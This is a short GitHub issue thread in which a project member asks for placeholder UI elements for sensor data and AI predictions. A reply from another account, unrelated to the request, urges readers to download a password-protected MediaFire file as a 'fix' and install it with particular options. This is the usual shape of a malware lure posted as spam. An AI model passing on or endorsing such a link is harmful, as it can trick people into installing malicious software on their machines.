### ISSUE TITLE
Design placeholder UI elements

### ISSUE THREAD

**Issue by BenCampbellNelson** [OtagoPolytechnic/Cloudy-with-a-Chance-of-LoRa#59]
Create placeholder elements to represent the data that will come from the sensors and AI predictions

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
